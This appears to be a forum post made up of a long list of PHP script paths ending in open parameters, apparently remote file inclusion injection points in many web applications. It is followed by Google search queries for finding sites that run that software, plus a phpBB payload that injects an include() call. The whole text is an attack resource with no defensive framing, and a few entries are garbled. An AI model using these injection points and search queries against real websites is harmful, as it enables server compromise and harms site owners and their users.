/inhalt.php?dateien[news]=
/system/libraries/Geeklog/MVCnPHP/BaseView.php?glConf[path_libraries]=
/theme/settings.php?pfad_z=
/includes/class_template.php?phpbb_root_path=
/previewtheme.php?theme=1&inc_path=
/lib/exifer/exif.php?lib_path?=
/index.php?rootpath=
/poll.php?root_path=
/ezconvert/config.php?ezconvert_dir=
/sipssys/code/box.inc.php?config[sipssys]=
/Shared/controller/text.ctrl.php?level=
/UserMan/controller/common.function.php?level=
/plateforme/code/inc/common.inc.php?inc_path=
/library/StageLoader.php?GLOBALS[core][module_path]=
/includes/includes.php?site_path=
/includes/functions.php?phpbb_root_path=
/includes/usercp_viewprofile.php?phpbb_root_path=
/cadre/fw/class.Quick_Config_Browser.php?GLOBALS[config][framework_path]=
/lang/leslangues.php?fichier=
/gallery/theme/include_mode/template.php?galleryfilesdir=
/includes/functions.php?phpbb_root_path=
/portal/portal.php?phpbb_root_path=
/include/themes/themefunc.php?myNewsConf[path][sys][index]=
/includes/functions.php?phpbb_root_path=
/include/debug.php?config[debug]=
/membres/membreManager.php?include_path=
/xt_counter.php?server_base_dir=
/include/lib/lib_head.php?cfgPathModule=
/system/lib/package.php?gl_root=
/ains_main.php?ains_path=
/download.php?fname=
/vp/configure.php?phpbb_root_path=
/config.php?sql_language=
/modules/mail/main.php?MODULES_DIR=
/admin/admin_linkdb.php?phpbb_root_path=
/admin/admin_forum_prune.php?phpbb_root_path=
/admin/admin_extensions.php?phpbb_root_path=
/admin/admin_board.php?phpbb_root_path=
/admin/admin_attachments.php?phpbb_root_path=
/admin/admin_users.php?phpbb_root_path=
/lib/selectlang.php?BBC_LANGUAGE_PATH=
/include/dom.php?path=
/include/dtd.php?path=
/include/parser.php?path=
/defines.php?WEBCHATPATH=
/upload/top.php?maindir=
/include/config.inc.php?racine=
/include/includes.php?include_path=
/lib/nl/nl.php?g_strRootDir=
/up.php?my[root]=
/libraries/grab_globals.lib.php?inc_dir=
/mep/frame.php?chem=
/frontpage.php?setup_folder=
/lang/index.php?file=
/show.php?PollDir=
/i-accueil.php?chemin=
/include/common.php?env[rootPath]=
/include/forms.php?INCLUDE_DIR=
/include/issue_edit.php?INCLUDE_DIR=
/include/client.php?INCLUDE_DIR=
/include/classes.php?INCLUDE_DIR=
/routines/fieldValidation.php?jssShopFileSystem=
/config/config_admin.php?INC=
/config/config_main.php?INC=
/config/config_member.php?INC=
/config/mysql_config.php?INC=
/admini/admin.php?INC=
/admini/index.php?INC=
/paypalipn/ipnprocess.php?INC=
/members/index.php?INC=
/members/registration.php?INC=
/main/ppcbannerclick.php?INC=
/main/ppcclick.php?INC=
/include/common_function.php?_config[site_path]=
/comments.php?AMG_serverpath=
/signin.php?sent=1&AMG_serverpath=
/index.php?AML_opensite=
/index.php?AMV_openconfig=1&AMV_serverpath=
/index.php?custom_admin_path=
/archives.php?custom_admin_path=
/inc/init.inc.php?current_path=
/bu/bu_claro.php?bu_dir=
/bu/bu_cache.php?bu_dir=
/bu/bu_parse.php?bu_dir=
/bridge/enigma/E2_header.inc.php?boarddir=
/WordPress_Files/All_Users/wp-content/plugins/Enigma2.php?boarddir=
/bu/process.php?bu_dir=
/bu/process.php?bu_config[dir]=
/archive.php?CONFIG[script_path]=
/headlines.php?CONFIG[script_path]=
/eventcal/mod_eventcal.php?lm_absolute_path=
/modules/mx_pafiledb/pafiledb/includes/pafiledb_constants.php?module_root_path=
/admin.php?cal_dir=
/contacts.php?cal_dir=
/convert-date.php?cal_dir=
/popup.php?include_path=
/rss.php?include_path=
/ajax_request.php?include_path=
/mediabroadcast.php?include_path=
/includes/archive/archive_topic.php?phpbb_root_path=
/gallery.scr.php?GLOBALS[PTH][func]=
/sitemap.scr.php?GLOBALS[PTH][classes]=
/news.scr.php?GLOBALS[PTH][classes]=
/polls.scr.php?GLOBALS[PTH][classes]=
/rss.scr.php?GLOBALS[PTH][classes]=
/search.scr.php?GLOBALS[PTH][classes]=
/xtextarea.scr.php?GLOBALS[PTH][spaw]=
/form.func.php?GLOBALS[PTH][classes]=
/general.func.php?GLOBALS[PTH][classes]=
/groups.func.php?GLOBALS[PTH][classes]=
/js.func.php?GLOBALS[PTH][classes]=
/sections.func.php?GLOBALS[PTH][classes]=
/users.func.php?GLOBALS[PTH][classes]=
/modules/character_roster/include.php?mod_root=
/gallery/displayCategory.php?basepath=
/ataturk.php?page=
/src/admin/pt_upload.php?config_file=[local server file]&ptconf[src]=
/b2verifauth.php?index=
/authenticate.php?default_path_for_themes=
/admin/auth.php?emgb_admin_path=
/compteur/mapage.php?chemin=
/index.php?lang=
/common.inc.php?CFG[libdir]=
/common.inc.php?CFG[localedir]=
/form_header.php?errormsg=1&CFG[localelangdir]=
/footer.inc.php?settings[footer]=
/[inertia_dir]/inertianews_main.php?inews_path=
/config/sender.php?ROOT_PATH=
/music/buycd.php?HTTP_DOCUMENT_ROOT=
http://[target]/[path]/include/body.inc.php?menu=
/include/index.inc.php?incpath=
/include/account.inc.php?action=update&incpath=
/include/admin_newcomm.inc.php?action=create&incpath=
/include/header_admin.inc.php?incpath=
/include/header.inc.php?incpath=
/include/friends.inc.php?action=invite&incpath=
/include/menu_u.inc.php?incpath=
/include/notify.inc.php?action=sendit&incpath=
/include/body.inc.php?incpath=?
/include/body_admin.inc.php?menu=
/include/body_admin.inc.php?incpath=?
/include/commrecc.inc.php?action=recommend&incpath=
/include/do_reg.inc.php?incpath=?
/include/comm_post.inc.php?action=post&incpath=
/include/menu_v.inc.php?incpath=
/protection.php?action=logout&siteurl=
/archive.php?abs=
/admin/index_sitios.php?_VIEW=
/main.inc.php?pathtoscript=
/modules/mx_links/language/lang_english/lang_admin.php?mx_root_path=
/modules/mx_charts/charts_constants.php?module_root_path=
/modules/mx_meeting/pages/meeting_constants.php?module_root_path=
/member/usercp_menu.php?script_folder=
/basic.inc.php?basepath_start=
/includes/common.php?module_root_path=
/Blog_CMS/admin/plugins/NP_UserSharing.php?DIR_ADMIN=
/mxBB/modules/kb_mods/includes/kb_constants.php?module_root_path=
/mxBB/modules/kb_mods/includes/kb_constants.php?kb_constants.php&board_config[default_lang]=
/includes/common.php?module_root_path=
/mxBB/modules/mx_act/include/constants/act_constants.php?mx_root_path=
/interface.php?basepath=
/includes/profilcp_constants.php?module_root_path=
/gizzar/index.php?basePath=
/cm68news/engine/oldnews.inc.php?addpath=
/common.php?db_file=
/inc/shows.inc.php?cutepath=
/activate.php?language=conf&footerpage=
/includes/common.php?module_root_path=
/inc/CONTROL/imports/import-mt.php?basepath=foo&inc_path=
/styles.php?toroot=
/centre.php?page=
/addcode.php?hm=
/owllib/memory/OWLMemoryProperty.php?OWLLIB_ROOT=
/Index.php?abs_url=
/php.incs/common.inc.php?cm_basedir=
/PhotoCart/adminprint.php?admin_folder=
/PhotoCart/adminprint.php?path=
/includes/admin.php?templatesDirectory=
/includes/password.php?GlobalSettings[templatesDirectory]=
/includes/profile.php?GlobalSettings[templatesDirectory]=
/includes/merge.php?GlobalSettings[templatesDirectory]=
/includes/adminPolls.php?GlobalSettings[templatesDirectory]=
/includes/poll.php?GlobalSettings[templatesDirectory]=
/phppc/poll.php?is_phppc_included=1&relativer_pfad=
/phppc/poll_kommentar.php?is_phppc_included=1&relativer_p fad=
/phppc/poll_sm.php?is_phppc_included=1&relativer_pfad=
/phpquickgallery/gallery_top.inc.php?textFile=
/core/editor.php?editor_insert_bottom=
/act/act_check_access.php?apx_root_path=
/dsp/dsp_form_booking_ctl.php?apx_root_path=
/dsp/dsp_bookings.php?apx_root_path=
/includes/mx_common.php?module_root_path=
/check_status.php?dicshunary_root_path=
/_basicfunctions.php?DIR=
/pageactionauthor.php?DIR=
/pntUnit/Inspect.php?Include=
/phpjobschedule_PATH/add-modify.php?installed_config_file=
/phpjobschedule_PATH/delete.php?installed_config_file=
/phpjobschedule_PATH/modify.php?installed_config_file=
/phpjobschedule_PATH/phpjobscheduler.php?installed_config_file=
/includes/user_standard.php?relative_root=
/include/classes/pear/DB/mysql.php?baseDir=
/include/classes/pear/DB/mysqli.php?baseDir=
/core/core.php?root=
/work/index.php?g_include=
/work/module/forum/forum.php?g_include=
/inc/session.php?sessionerror=0&lang=
/index.php?function=custom&custom=
/language.inc.php?langs_dir=
/admin/index.php?p=
/admin/auth/secure.php?cfgProgDir=
/admin/auth/checklogin.php?cfgProgDir=
/inc/irayofuncs.php?irayodirhack=
/dodosmail.php?dodosmail_header_file=
/dodosmail.php?dodosmail_footer_file=
/admin/mods/simplechat_1.0.0/chat_panel.php?talk=1&msg=
/evilfile.php?evil_include=
/ad_main.php?_mygamefile=
/sohoadmin/program/includes/shared_functions.php?_SESSION[docroot_path]=
/sohoadmin/client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=
/cyberfolio/portfolio/msg/view.php?av=
/cyberfolio/portfolio/admin/incl_voir_compet.php?av=
/modules/Mysqlfinder/MysqlfinderAdmin.php?_SESSION[PATH_COMPOSANT]=
/interface/billing/billing_process.php?srcdir=
/interface/new/new_patient_save.php?srcdir=
/login.php?srcdir=
/library/translation.inc.php?GLOBALS[srcdir]=
/modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=
/lib/includes/loader.cmd.php?store_config[code]=
/lib/includes/loader.ftp.php?store_config[code]=
/lib/includes/loader.soap.php?store_config[code]=
/lib/includes/loader.web.php?store_config[code]=
/includes/xhtml.php?d_root=
/function_log.php?racine=
/function_balise_url.php?racine=
/connection.php?racine=
/admin/controls/cart.php?_saz[settings][shippingfolder]=
/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=
/volume.php?config[public_dir]=
/admin.php?pb_lang=
/pbook.php?pb_lang=
/gepi/gestion/savebackup.php?filename=
/themes/fin.php?themes=
/users/include/body.inc.php?reqpath=
/users/include/body_blog.inc.php?reqpath=
/users/include/upload_ht.inc.php?usrinc=
/common.php?SWSDIR=
/faq_reply.php?email=
/modules/core/demo/append.php?PS_BASE=
/modules/core/html/append.php?PS_BASE=
/upgrades/2.1beta1/upgrade.php?amp_conf[AMPWEBROOT]=
/Core/core.inc.php?fullpath=
/ip.inc.php?type=1&cgipath=
/mcNews/admin/header.php?skinfile=
/include/init.inc.php?G_PATH=
/backend/addons/links/index.php?PATH=
/inc/download_center_lite.inc.php?script_root=
/modules/vWar_Account/includes/functions_common.php?vwar_root2=
/lib/armygame.php?libpath=
/includes/get_header.php?vwar_root=
/application.php?base_path=
/kernel/loadkernel.php?installPath=
/include/SQuery/gameSpy2.php?libpath=
/event.php?myevent_path=
/index.php?page=
/movie_cls.php?full_path=
/toplist.php?f=toplist_top10&phpbb_root_path=
/admin/addentry.php?phpbb_root_path=
/admin/addentry.php?phpbb_root_path=
/show.php?path=
/eshow.php?Config_rootdir=
/auction/auction_common.php?phpbb_root_path=
/index.php?inc_dir=
/visible_count_inc.php?statitpath=
/includes/phpdig/includes/config.php?relative_script_path=
/direct.php?rf=
/extauth/drivers/ldap.inc.php?clarolineRepositorySys=
/claroline/auth/ldap/authldap.php?includePath=
/includes/pafiledb_constants.php?module_root_path=
/public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=
/include.php?path=
/functions.php?path=
/end.php?footfile=
/include/menu_builder.php?config[page_dir]=
/index.php?page=
/textpattern/publish.php?txpcfg[txpath]=
/classes/class_admin.php?PathToComment=
/classes/class_comments.php?PathToComment=
/lib.editor.inc.php?sys_path=
/login/secure.php?cfg[homepath]=
/faq.php?foing_root_path=
/index.php?foing_root_path=
/list.php?foing_root_path=
/login.php?foing_root_path=
/playlist.php?foing_root_path=
/song.php?foing_root_path=
/gen_m3u.php?foing_root_path=
/view_artist.php?foing_root_path=
/view_song.php?foing_root_path=
/login.php?foing_root_path=
/playlist.php?foing_root_path=
/song.php?foing_root_path=
/flash/set_na.php?foing_root_path=
/flash/initialise.php?foing_root_path=
/flash/get_song.php?foing_root_path=
/includes/common.php?foing_root_path=
/admin/nav.php?foing_root_path=
/admin/main.php?foing_root_path=
/admin/list_artists.php?foing_root_path=
/admin/index.php?foing_root_path=
/admin/genres.php?foing_root_path=
/admin/edit_artist.php?foing_root_path=
/admin/edit_album.php?foing_root_path=
/admin/config.php?foing_root_path=
/admin/admin_status.php?foing_root_path=
/OTSCMS.php?GLOBALS[config][otscms][directories][classes]=
/admin/inc/prepend.inc.php?path=
/admin/inc/lib/boxes.lib.php?path=
/admin/inc/lib/tools.lib.php?path=
/admin/tools/trackback/index.php?path=
/admin/tools/utf8conversion/index.php?path=
/inc/prepend.inc.php?path=
/inc/lib/boxes.lib.php?path=
/inc/lib/history.lib.php?path=
/mdweb/admin/inc/organisations/form_org.inc.php?chemin_appli=
/mdweb/admin/inc/organisations/country_insert.php?chemin_appli=
/jaws_PATH/html/include/JawsDB.php?path=
/misc/function.php3?path=
/modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path =
/RR.php?phpdns_basedir=
/include/entrancePage.tpl.php?SPEEDBERG_PATH=
/include/generalToolBox.tlb.php?SPEEDBERG_PATH=
/include/myToolBox.tlb.php?SPEEDBERG_PATH=
/include/scriplet.inc.php?SPEEDBERG_PATH=
/include/simplePage.tpl.php?SPEEDBERG_PATH=
/include.class.php?SPEEDBERG_PATH=
/include/standardPage.tpl.php?SPEEDBERG_PATH=
/common.php?ezt_root_path=
/main.php?config=
/kawf/user/account/main.php?config=
/phpcalendar/includes/calendar.php?phpc_root_path=
/phpcalendar/includes/setup.php?phpc_root_path=
/editmeetings/session.php?PROJECT_ROOT=
/email/session.php?PROJECT_ROOT=
/entityproperties/session.php?PROJECT_ROOT=
/inc/mail.php?PROJECT_ROOT=
/_msdazu_pdata/redaktion/artikel/up/index.php?path_red2=
/_msdazu_share/richtext/addtort.php?path_red2=
/_msdazu_share/richtext/colorpik2.php?path_red2=
/_msdazu_share/richtext/colorpik3.php?path_red2=
/_msdazu_share/richtext/extras_menu.php?path_red2=
/_msdazu_share/richtext/farbpalette.php?path_red2=
/_msdazu_share/richtext/lese_inc.php?path_red2=
/_msdazu_share/richtext/newfile.php?path_red2=
/_msdazu_share/share/insert1.php?path_scr_dat2=
/_msdazu_share/extras/downloads/index.php?path_red=
/admin/admin_module.php?g_admin_rep=
/modules/My_eGallery/public/displayCategory.php?adminpath=
/modules/My_eGallery/public/displayCategory.php?basepath=
/themes/program/themesettings.inc.php?themesdir=
/config.inc.php3?rel_path=
/db/txt.inc.php?file=&check=0&email[to]=
/db/txt.inc.php?file=&check=0&comment=
/evilfile.php?evil_include=
/php/plugins/main.php?plug_path=
/local/lib/lcUser.php?LIBDIR=
/modules/guestbook/index.php?CONFIG[local_root]=
/index.php?class_path=
/edit.php?javascript_path=
/circ.php?include_path=
/templates/barrel/template.tpl.php?renderer=
/templates/sidebar/template.tpl.php?renderer=
/templates/text-only/template.tpl.php?renderer=
/templates/slashdot/template.tpl.php?renderer=
/templates/penguin/template.tpl.php?renderer=
/templates/pda/template.tpl.php?renderer=
/templates/oerdec/template.tpl.php?renderer=
/templates/nifty/template.tpl.php?renderer=
/templates/mylook/template.tpl.php?renderer=
/templates/barry/template.tpl.php?renderer=
/sw/index_sw.php?doc_directory=
/sw/lib_cart/cart.php?doc_directory=
/sw/lib_cart/lib_cart.php?doc_directory=
/sw/lib_comment/comment.php?doc_directory=
/web/lib/xml/oai/GetRecord.php?lib_dir=
/client.php?dir=
/p-news.php?pn_lang=
/template.php?actionsPage=
/template.php?formPage=
/forum/track.php?path=
/implementation/management/priv/bugreporter/thankyou.php?g_documentRoot=
/process.php?DEFAULT_SKIN=
/template/barnraiser_01/p_new_password.tpl.php?templatePath=
/template/purpletech/base_include.php?page=
/centipaid_class.php?absolute_path=
/inc/settings.php?inc_dir=
/extras/mt.php?web_root=
/common/visiteurs/include/menus.inc.php?lvc_include_dir=
/include/theme.inc.php?fullpath=
/include/footer.inc.php?fullpath=
/genepi.php?topdir=
/modification/SendAlertEmail.php?AGE=
/includes/functions_mod_user.php?phpbb_root_path=
/community/Offline.php?sourcedir=
/lib/registry.lib.php?lib_dir=
/lib/sqlcompose.lib.php?lib_dir=
/lib/sqlsearch.lib.php?lib_dir=
/admin/includes/spaw/spaw_control.class.php?spaw_root=
/common.php?phpht_real_path=
/addon_keywordreplacer.php?pathToFiles=
/add.php?Htmls=
/admin.php?Htmls=
/look.php?Htmls=
/re.php?Htmls=
/phpBB2/includes/functions_mod_user.php?phpbb_root_path=
/shoutbox.php?phpbb_root_path=
/naboard_pnr.php?skin=
/report.php?scriptpath=
/archive.php?scriptpath=
/comments.php?scriptpath=
/init.php?scriptpath=
/news.php?scriptpath=
/ftag.php?mostrar=
/ftag.php?mostrar=
/main.php?page=
/param_editor.php?folder=
/index.php?contentSpecial=
/index.php?section=
/redir.php?foaf=
/getimg.php?img=
/modules/Calendar/admin/update.php?calpath=
/modules/Calendar/scheme.php?calpath=
/modules/Calendar/calendar.php?calpath=
/claroline/inc/lib/import.lib.php?includePath=
/example/lib/grid3.lib.php?cfg_dir=
/jinzora2/backend/primitives/cache/media.php?include_path=
/include/cts/standart.inc.php?topdir=
/sw/lib_up_file/file.php?doc_directory=
/sw/lib_up_file/find_file.php?doc_directory=
/sw/lib_comment/comment.php?doc_directory=
/sw/lib_find/find.php?doc_directory=
/webyep-system/programm/lib/WYApplication.php?webyep_sIncludePath=
/webyep-system/programm/lib/WYDocument.php?webyep_sIncludePath=
/webyep-system/programm/webyep.php?webyep_sIncludePath=
/webyep-system/programm/elements/WYGalleryElement.php?webyep_sIncludePath=
/sw/lib_user/find_user.php?doc_directory=
/sw/lib_user/user.php?doc_directory=
/sw/lib_comment/comment.php?doc_directory=
/sw/lib_session/session.php?doc_directory=
/include/disp_form.php3?cfg_include_dir=
/include/disp_smileys.php3?cfg_include_dir=
/include/little_news.php3?cfg_include_dir=
/include/index.php3?cfg_include_dir=
/moteur/moteur.php?chemin=
/forum.php?cfg_file=1&fpath=
/includes/functions_num_image.php?phpbb_root_path=
/includes/functions_user_viewed_posts.php?phpbb_root_path=
/images/smileys/smileys_packs.php?smileys_dir=
/index.php?catid=
/includes/logger_engine.php?phpbb_root_path=
/includes/themen_portal_mitte.php?phpbb_root_path=
/includes/logger_engine.php?phpbb_root_path=
/module/forum/main.php?id=1&main_dir=
/module/forum/headlines.php?id=1&main_dir=
/admin/admin_topic_action_logging.php?setmodules=pagestar t&phpbb_root_path=
/includes/footer.php?PHPGREETZ_INCLUDE_DIR=
/includes/functions_static_topics.php?phpbb_root_path=
/functions.php?pmp_rel_path=
/includes/functions.php?phpbb_root_path=
/wamp_dir/setup/yesno.phtml?no_url=
/change_preferences2.php?target=
/create_file.php?target=
/upload_local.php?target=
/upload_multi.php?target=
/index.php?file_name[]=
/forum/search.php?repertorylevel=
/forum/message.php?repertorylevel=
/forum/member.php?repertorylevel=
/forum/mail.php?repertorylevel=
/forum/lostpassword.php?repertorylevel=
/forum/gesfil.php?repertorylevel=
/forum/forum82lib.php3?repertorylevel=
/include/config.inc.php?lvc_include_dir=
/index.php?page=
/window.php?action=
/secure.php?cfgProgDir=
/includes/functions_kb.php?phpbb_root_path=
/includes/bbcb_mg.php?phpbb_root_path=
/include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=
/sources/myaccount.php?open_box=
/sources/myaccount.php?middle_box=
/sources/myaccount.php?close_box=
/navigation/search.php?navigation_end=
/navigation/donation.php?navigation_start=
/navigation/donation.php?navigation_middle=
/navigation/donation.php?navigation_end=
/navigation/latestnews.php?navigation_start=
/navigation/latestnews.php?navigation_middle=
/navigation/links.php?navigation_start=
/navigation/links.php?navigation_middle=
/parse/parser.php?WN_BASEDIR=
/navigation/menu.php?navigation_start=
/hit.php?url_hit=
/view/general.php?_SESSION['dirMain']=
/templates/pb/language/lang_nl.php?temppath=
/admin/admin_topic_action_logging.php?setmodules=
/track.php?path=
/connect.php?path=
/admin/index.php?o=
/fsl2/objects/fs_form_links.php?GLOBALS[fsinit][objpath]=
/template.php?content_page=
/libs/dbmax/mysql.php?GLOBALS['lib']['db']['path']=
/mcf.php?content=
/admin/testing/tests/0004_init_urls.php?init_path=
/global.php?nbs=
/dix.php3?url_phpartenaire=
/inc/ifunctions.php?GLOBALS[phpQRootDir]=
/manager/pages/AccountsPage.class.php?base_path=

/manager/pages/AddInvoicePage.class.php?base_path=

/manager/pages/AddIPAddressPage.class.php?base_path=

/manager/pages/AddPaymentPage.class.php?base_path=

/manager/pages/AddTaxRulePage.class.php?base_path=

/manager/pages/AssignDomainPage.class.php?base_path=

/manager/pages/AssignHostingPage.class.php?base_path=

/manager/pages/AssignProductPage.class.php?base_path=

/manager/pages/BillingPage.class.php?base_path=

/manager/pages/BillingPaymentPage.class.php?base_path=

/manager/pages/BrowseAccountsPage.class.php?base_path=

/manager/pages/BrowseInvoicesPage.class.php?base_path=

/manager/pages/ConfigureEditUserPage.class.php?base_path=

/manager/pages/ConfigureNewUserPage.class.php?base_path=

/manager/pages/ConfigureNewUserReceiptPage.class.php?base_path=

/manager/pages/ConfigureUsersPage.class.php?base_path=

/manager/pages/DeleteAccountPage.class.php?base_path=

/manager/pages/DeleteDomainServicePage.class.php?base_path=

/manager/pages/DeleteHostingServicePage.class.php?base_path=

/manager/pages/DeleteInvoicePage.class.php?base_path=

/manager/pages/DeleteProductPage.class.php?base_path=

/manager/pages/DeleteServerPage.class.php?base_path=

/manager/pages/DomainServicesPage.class.php?base_path=

/manager/pages/DomainsPage.class.php?base_path=

/manager/pages/EditAccountPage.class.php?base_path=

/manager/pages/EditDomainPage.class.php?base_path=

/manager/pages/EditDomainServicePage.class.php?base_path=

/manager/pages/EditHostingServicePage.class.php?base_path=

/manager/pages/EditPaymentPage.class.php?base_path=

/manager/pages/EditProductPage.class.php?base_path=

/manager/pages/EditServerPage.class.php?base_path=

/manager/pages/EmailInvoicePage.class.php?base_path=

/manager/pages/ExecuteOrderPage.class.php?base_path=

/manager/pages/ExpiredDomainsPage.class.php?base_path=

/manager/pages/FulfilledOrdersPage.class.php?base_path=

/manager/pages/GenerateInvoicesPage.class.php?base_path=

/manager/pages/HomePage.class.php?base_path=

/manager/pages/InactiveAccountsPage.class.php?base_path=

/manager/pages/IPManagerPage.class.php?base_path=

/manager/pages/LoginPage.class.php?base_path=

/manager/pages/LogPage.class.php?base_path=

/manager/pages/ModulesPage.class.php?base_path=

/manager/pages/NewAccountPage.class.php?base_path=

/manager/pages/NewDomainServicePage.class.php?base_path=

/manager/pages/NewProductPage.class.php?base_path=
Thanks Reply With Quote
inurl:/modules/My_eGallery/public/displayCategory.php?basepath=

inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=

inurl:/include/new-visitor.inc.php?lvc_include_dir=

inurl:/_functions.php?prefix=

inurl:/cpcommerce/_functions.php?prefix=

inurl:/modules/coppermine/themes/default/theme.php?THEME_DIR=

inurl:/modules/agendax/addevent.inc.php?agendax_path=

inurl:/ashnews.php?pathtoashnews=

inurl:/eblog/blog.inc.php?xoopsConfig[xoops_url]=

inurl:/pm/lib.inc.php?pm_path=

inurl:/b2-tools/gm-2-b2.php?b2inc=

inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=

inurl:/modules/agendax/addevent.inc.php?agendax_path=

inurl:/includes/include_once.php?include_file=

inurl:/e107/e107_handlers/secure_img_render.php?p=

inurl:/shoutbox/expanded.php?conf=

inurl:/main.php?x=

inurl:/myPHPCalendar/admin.php?cal_dir=

inurl:/index.php/main.php?x=

inurl:/index.php?include=

inurl:/index.php?x=

inurl:/index.php?open=

inurl:/index.php?visualizar=

inurl:/template.php?pagina=

inurl:/index.php?pagina=

inurl:/index.php?inc=

inurl:/includes/include_onde.php?include_file=

inurl:/index.php?page=

inurl:/index.php?pg=

inurl:/index.php?show=

inurl:/index.php?cat=

inurl:/index.php?file=

inurl:/db.php?path_local=

inurl:/index.php?site=

inurl:/htmltonuke.php?filnavn=

inurl:/livehelp/inc/pipe.php?HCL_path=

inurl:/hcl/inc/pipe.php?HCL_path=

inurl:/inc/pipe.php?HCL_path=

inurl:/support/faq/inc/pipe.php?HCL_path=

inurl:/help/faq/inc/pipe.php?HCL_path=

inurl:/helpcenter/inc/pipe.php?HCL_path=

inurl:/live-support/inc/pipe.php?HCL_path=

inurl:/gnu3/index.php?doc=

inurl:/gnu/index.php?doc=

inurl:/phpgwapi/setup/tables_update.inc.php?appdir=

inurl:/forum/install.php?phpbb_root_dir=

inurl:/includes/calendar.php?phpc_root_path=

inurl:/includes/setup.php?phpc_root_path=

inurl:/inc/authform.inc.php?path_pre=

inurl:/include/authform.inc.php?path_pre=

inurl:index.php?nic=

inurl:index.php?sec=

inurl:index.php?content=

inurl:index.php?link=

inurl:index.php?filename=

inurl:index.php?dir=

inurl:index.php?document=

inurl:index.php?view=

inurl:*.php?sel=

inurl:*.php?session=&content=

inurl:*.php?locate=

inurl:*.php?place=

inurl:*.php?layout=

inurl:*.php?go=

inurl:*.php?catch=

inurl:*.php?mode=

inurl:*.php?name=

inurl:*.php?loc=

inurl:*.php?f=

inurl:*.php?inf=

inurl:*.php?pg=

inurl:*.php?load=

inurl:*.php?naam=

allinurl:/index.php?page= site:*.dk

allinurl:/index.php?file= site:*.dk

INURL OR ALLINURL WITH:

/temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=

/includes/header.php?systempath=

/Gallery/displayCategory.php?basepath=

/index.inc.php?PATH_Includes=

/ashnews.php?pathtoashnews=

/ashheadlines.php?pathtoashnews=

/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

/demo/includes/init.php?user_inc=

/jaf/index.php?show=

/inc/shows.inc.php?cutepath=

/poll/admin/common.inc.php?base_path=

/pollvote/pollvote.php?pollname=

/sources/post.php?fil_config=

/modules/My_eGallery/public/displayCategory.php?basepath=

/bb_lib/checkdb.inc.php?libpach=

/include/livre_include.php?no_connect=lol&chem_absolu=

/index.php?from_market=Y&pageurl=

/modules/mod_mainmenu.php?mosConfig_absolute_path=

/pivot/modules/module_db.php?pivot_path=

/modules/4nAlbum/public/displayCategory.php?basepath=

/derniers_commentaires.php?rep=

/modules/coppermine/themes/default/theme.php?THEME_DIR=

/modules/coppermine/include/init.inc.php?CPG_M_DIR=

/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=

/coppermine/themes/maze/theme.php?THEME_DIR=

/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=

/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=

/myPHPCalendar/admin.php?cal_dir=

/agendax/addevent.inc.php?agendax_path=

/modules/mod_mainmenu.php?mosConfig_absolute_path=

/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=

/main.php?page=

/default.php?page=

/index.php?action=

/index1.php?p=

/index2.php?x=

/index2.php?content=

/index.php?conteudo=

/index.php?cat=

/include/new-visitor.inc.php?lvc_include_dir=

/modules/agendax/addevent.inc.php?agendax_path=

/shoutbox/expanded.php?conf=

/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

/pivot/modules/module_db.php?pivot_path=

/library/editor/editor.php?root=

/library/lib.php?root=

/e107/e107_handlers/secure_img_render.php?p=

/zentrack/index.php?configFile=

/main.php?x=

/becommunity/community/index.php?pageurl=

/GradeMap/index.php?page=

/index4.php?body=

/side/index.php?side=

/main.php?page=

/es/index.php?action=

/index.php?sec=

/index.php?main=

/index.php?sec=

/index.php?menu=

/html/page.php?page=

/page.php?view=

/index.php?menu=

/main.php?view=

/index.php?page=

/content.php?page=

/main.php?page=

/index.php?x=

/main_site.php?page=

/index.php?L2=

/content.php?page=

/main.php?page=

/index.php?x=

/main_site.php?page=

/index.php?L2=

/index.php?show=

/tutorials/print.php?page=

/index.php?page=

/index.php?level=

/index.php?file=

/index.php?inter_url=

/index.php?page=

/index2.php?menu=

/index.php?level=

/index1.php?main=

/index1.php?nav=

/index1.php?link=

/index2.php?page=

/index.php?myContent=

/index.php?TWC=

/index.php?sec=

/index1.php?main=

/index2.php?page=

/index.php?babInstallPath=

/main.php?body=

/index.php?z=

/main.php?view=

/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

/index.php?file=

/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

1. allinurl:my_egallery site:.org
/modules/My_eGallery/public/displayCategory.php?basepath=

2. allinurl:xgallery site:.org
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

3. allinurl:coppermine site:.org
/modules/coppermine/themes/default/theme.php?THEME_DIR=

4. allinurl:4nAlbum site:.org
/modules/4nAlbum/public/displayCategory.php?basepath=

5. allinurlP:NphpBB2 site:.org
/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

6. allinurl:ihm.php?p=

7. Keyword : “powered by AllMyLinks”
/include/footer.inc.php?_AMLconfig[cfg_serverpath]=

8. allinurl:/modules.php?name=allmyguests
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

9. allinurl:/Popper/index.php?
/Popper/index.php?childwindow.inc.php?form=

10. google = kietu/hit_js.php, allinurl:kietu/hit_js.php
yahoo = by Kietu? v 3.2
/kietu/index.php?kietu[url_hit]=

11. keyword : “Powered by phpBB 2.0.6?
/html&highlight=%2527.include($_GET[a]),exit.%2527&a=

12. keyword : “powered by CubeCart 3.0.6?
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=

13. keyword : “powered by paBugs 2.0 Beta 3?
/class.mysql.php?path_to_bt_dir=

14. allinurl:”powered by AshNews”, allinurl:AshNews atau allinurl: /ashnews.php
/ashnews.php?pathtoashnews=

15. keyword : /phorum/login.php
/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=

16. allinurl:ihm.php?p=*

14. keyword : “powered eyeOs”
